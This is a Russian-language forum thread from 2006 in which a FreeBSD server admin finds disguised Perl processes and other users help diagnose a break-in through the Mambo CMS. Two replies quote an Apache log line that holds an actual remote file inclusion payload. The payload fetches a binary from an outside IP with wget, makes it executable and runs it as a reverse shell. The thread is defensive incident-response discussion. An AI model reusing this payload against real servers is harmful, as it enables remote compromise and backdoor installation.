форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение		[Проследить за развитием треда]

"Что это за процессы"

Сообщение от MoHaX (ok) on 07-Апр-06, 06:06

Сегодня с утра решил проверить один из серверов (FreeBSD 4.9, на нём apache+mod_php, mysql, postfix). Работает себе и работает. Давно на него не смотрел, далеко стоит, никто не жалуется и вообщем забыл я про него ;) Посмотрел top, а там какие-то перловые процессы (6 штук) жрут всё процессорное время). Запущены от имени пользователя от которого apache запущен. Посмотрел ps ax и улицизрел нечто мне не понятное: ---- 84545  ??  R    1339:43.32 /usr/sbin/sgrps (perl5.8.8) 84666  ??  R    1324:33.72 https (perl5.8.8) 87437  ??  R    657:48.63 ps x (perl5.8.8) 88356  ??  R    648:24.88 who (perl5.8.8) 88710  ??  R    645:24.59 /usr/bin/syst (perl5.8.8) 91287  ??  R    509:06.80 /usr/sbin/apache/log (perl5.8.8) 93136  ??  I      0:00.01 pickup -l -t fifo -u 96427  ??  I      0:00.00 who (perl5.8.8) 96428  ??  Z      0:00.00  (sh) 96431  ??  S      4:52.03 /usr/local/apache/bin/httpd (perl5.8.8) 1392  p0  I+     0:00.00 sh -ev 1394  p0  I+     0:00.03 make -B _java.describe 1400  p0  I+     0:00.00 /bin/sh -ec OK=""; sub=java;  for dud in $DUDS; do  i 1401  p0  I+     0:00.07 make -B describe DIRPRFX=java/ 1407  p0  S+     0:00.05 /bin/sh -ec for sub in avalon-logkit berkeley-db blue 13350  p0  I+     0:00.00 sh -ev 13351  p0  I+     0:00.03 make -B _mail.describe 13357  p0  I+     0:00.00 /bin/sh -ec OK=""; sub=mail;  for dud in $DUDS; do  i 13358  p0  I+     0:00.29 make -B describe DIRPRFX=mail/ 13371  p0  S+     0:00.17 /bin/sh -ec for sub in abook adcomplain addresses akp 22526  p0  S+     0:00.01 make -B describe 22527  p0  S+     0:00.01 make -B describe 22528  p0  R+     0:00.00 sh -c echo "/var/db/ports/p5-CClient/options" 22529  p0  R+     0:00.00 sh -c echo "/var/db/ports/jdk14-doc/options" ---- Вот на пример такого /usr/sbin/sgrps файла вообще нету. Люди просветите меня чего то?

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Сообщения по теме

[Сортировка по времени, UBB]

1. "Что это за процессы"

Сообщение от sn (??) on 07-Апр-06, 08:58

Похоже это уже не твой сервер... это их сервер

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	2. "Что это за процессы"
	Сообщение от MoHaX (ok) on 07-Апр-06, 09:42
	>Похоже это уже не твой сервер... это их сервер Мне аж страшно стало, "их сервер" это страшно ;) Проверил всё chkrootkit'ом, всё чисто. Обновил систему до 4.11, обновил всё, чё там стоит. Вроде пока всё нормально. На этом сервере крутяться какие-то сайты на движке "мамбо", ну или как он там теперь называется. Может через это смогли такое сотворить? Какие ещё варианты?
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

3. "Что это за процессы"

Сообщение от redmoon (ok) on 07-Апр-06, 09:48

тебя сломали :) смотри что подозрительного  в /tmp с правами на исполнение. проверь chrootkit'ом проверь /etc/passwd /etc/shadow на предмет новых, незнакомых тебе пользователей. проверт трафик сервера. не больше ли он намного чем обычно. нет ли у Тебя случаем форума phpbb или fastbb или invision power board ?

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	4. "Что это за процессы"
	Сообщение от MoHaX (ok) on 07-Апр-06, 10:15
	>тебя сломали :) >смотри что подозрительного  в /tmp с правами на исполнение. >проверь chrootkit'ом >проверь /etc/passwd /etc/shadow на предмет новых, незнакомых тебе пользователей. >проверт трафик сервера. >не больше ли он намного чем обычно. >нет ли у Тебя случаем форума phpbb или fastbb или invision power >board ? chrootkit'ом проверил, пользователей проверил, всё в норме. На счёт форумов, может быть. Поговрил с ихним вебмастером, говорит, что вроде какая-то беда "мамбу" ломающая по инету лазит. Обесчал мамбу эту обновить. Чё ещё можно проверить?
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	5. "Что это за процессы"
	Сообщение от redmoon (ok) on 07-Апр-06, 10:25
	ну поубивай эти процессы. загони апач в чрут. пока он будет мамбу обновлять ..тебя могут поиметь по полной . :)) смотри tcpdump - куда лезут эти процессы ? паблочь файером ип адреса куда они лезут. поудивай бинарники программ, которые породили эти процессы.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	6. "Что это за процессы"
	Сообщение от MoHaX (ok) on 07-Апр-06, 10:46
	>ну поубивай эти процессы. >загони апач в чрут. >пока он будет мамбу обновлять ..тебя могут поиметь по полной . >:)) >смотри tcpdump - куда лезут эти процессы ? паблочь файером ип адреса >куда они лезут. >поудивай бинарники программ, которые породили эти процессы. Дык всё это уже сделал, кроме апача в песочнице. Будем смотреть и изучать логи апачи. Может найду откуда ноги растут :) Спасибо за помощь.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	7. "Что это за процессы"
	Сообщение от idle (ok) on 07-Апр-06, 12:13
	>>ну поубивай эти процессы. >>загони апач в чрут. >>пока он будет мамбу обновлять ..тебя могут поиметь по полной . >>:)) >>смотри tcpdump - куда лезут эти процессы ? паблочь файером ип адреса >>куда они лезут. >>поудивай бинарники программ, которые породили эти процессы. >Дык всё это уже сделал, кроме апача в песочнице. Будем смотреть и >изучать логи апачи. Может найду откуда ноги растут :) Спасибо за >помощь. Точно мамба, на всех серваках в логах такое: "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd /tmp;wget 217.160.255.44/cback;chmod 744 cback;./cback 24.249.101.182 8080;echo YYY;echo|  HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Вирусы любят мамбу.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	8. "Что это за процессы"
	Сообщение от redmoon (ok) on 07-Апр-06, 12:34
	>>>ну поубивай эти процессы. >>>загони апач в чрут. >>>пока он будет мамбу обновлять ..тебя могут поиметь по полной . >>>:)) >>>смотри tcpdump - куда лезут эти процессы ? паблочь файером ип адреса >>>куда они лезут. >>>поудивай бинарники программ, которые породили эти процессы. >>Дык всё это уже сделал, кроме апача в песочнице. Будем смотреть и >>изучать логи апачи. Может найду откуда ноги растут :) Спасибо за >>помощь. >Точно мамба, на всех серваках в логах такое: >"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd /tmp;wget 217.160.255.44/cback;chmod 744 cback;./cback 24.249.101.182 8080;echo YYY;echo|  HTTP/1.1" 404 >296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" >Вирусы любят мамбу. ну убей наконец этот cback из tmp а вообще .. прямая рекомендация на подобные случаи. это делать /tmp отдельным разделом , и монтировать его с опцией noexec, то есть в этом разделе нельзя будет на файл поставить право исполнения.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]